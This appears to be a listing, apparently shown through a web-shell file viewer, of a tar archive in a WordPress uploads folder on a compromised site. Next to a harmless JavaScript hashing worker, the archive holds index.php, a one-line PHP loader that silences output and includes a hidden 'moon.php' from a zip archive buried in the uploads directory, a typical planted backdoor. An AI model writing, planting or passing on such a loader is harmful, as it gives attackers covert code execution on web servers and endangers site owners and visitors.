| Current Path : /home/bechata/mp/wp-content/uploads/2022/ejn73c/ |
| Current File : /home/bechata/mp/wp-content/uploads/2022/ejn73c/worker.tar |
calcfilehash.js 0000666 00000001024 15176432454 0007524 0 ustar 00 var type = self.data.type,
bin = self.data.bin,
hashOpts = self.data.hashOpts;
self.res = {};
if (type === 'md5') {
let sp = new self.SparkMD5.ArrayBuffer();
sp.append(bin);
self.res.hash = sp.end();
} else {
let sha = new jsSHA('SHA' + (type.length === 5? type : ('-' + type)).toUpperCase(), 'ARRAYBUFFER'),
opts = {};
if (type === 'ke128') {
opts.shakeLen = hashOpts.shake128len;
} else if (type === 'ke256') {
opts.shakeLen = hashOpts.shake256len;
}
sha.update(bin);
self.res.hash = sha.getHash('HEX', opts);
}
5rfvus/index.php 0000666 00000000236 15176432454 0007636 0 ustar 00 <?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "moon.php"; include("zip:///home/bechata/mp/wp-content/uploads/depot/dm_10/y6g2nb/index.php.zip#$h");?>